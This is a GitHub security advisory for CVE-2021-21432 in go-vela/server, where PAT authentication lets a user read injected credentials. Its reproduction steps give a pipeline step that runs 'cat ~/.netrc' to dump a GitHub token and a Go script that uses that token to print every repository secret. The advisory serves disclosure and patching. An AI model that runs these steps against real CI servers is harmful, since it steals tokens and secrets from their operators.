Skip to content

Reject unauthorized access with GitHub PATs

High severity GitHub Reviewed Published Apr 8, 2021 in go-vela/server • Updated Oct 2, 2023

Package

gomod github.com/go-vela/server (Go)

Affected versions

>= 0.7.0, < 0.7.5

Patched versions

0.7.5

Description

Impact

What kind of vulnerability is it? Who is impacted?

The additional auth mechanism added within go-vela/server#246 enables some malicious user to obtain secrets utilizing the injected credentials within the ~/.netrc file. Steps to reproduce

  1. Create Vela server

  2. Login to Vela UI

  3. Promote yourself to Vela administrator

    • UPDATE users SET admin = 't' WHERE name = <username>
  4. Activate repository within Vela

  5. Add .vela.yml to the repository with the following content

    version: "1"
    
    steps:
    - name: steal
      image: alpine
      commands:
        - cat ~/.netrc
  6. Look at build logs to find the following content

    $ cat ~/.netrc
    machine <GITHUB URL>
    login x-oauth-basic
    password <token>
    
  7. Copy the password to be utilized in some later step

  8. Add secret(s) to activated repo

  9. Copy the following script into main.go

    package main
    
    import (
        "fmt"
        "github.com/go-vela/sdk-go/vela"
        "os"
    )
    
    func main() {
        // create client to connect to vela
        client, err := vela.NewClient(os.Getenv("VELA_SERVER_ADDR"), "vela", nil)
        if err != nil {
    	    panic(err)
        }
    
        // add PAT to request
        client.Authentication.SetPersonalAccessTokenAuth(os.Getenv("VELA_TOKEN"))
    
    
        secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})
        if err != nil {
    	    panic(err)
        }
    
        for _, secret := range *secrets {
    	    fmt.Println(*secret.Name)
    	    fmt.Println(*secret.Value)
        }
    }
  10. Run the main.go with environment specific settings

    • VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously> go run main.go

The previously posted script could be updated to utilize any API endpoint(s) the activated user has access against.

Patches

Has the problem been patched? What versions should users upgrade to?

  • Upgrade to v0.7.5 or later

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

  • No known workarounds

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory

References

@jbrockopp jbrockopp published to go-vela/server Apr 8, 2021
Published by the National Vulnerability Database Apr 9, 2021
Reviewed May 20, 2021
Published to the GitHub Advisory Database Feb 15, 2022
Last updated Oct 2, 2023

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Adjacent
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L

EPSS score

0.098%
(41st percentile)

CVE ID

CVE-2021-21432

GHSA ID

GHSA-8j3f-mhq8-gmh4

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.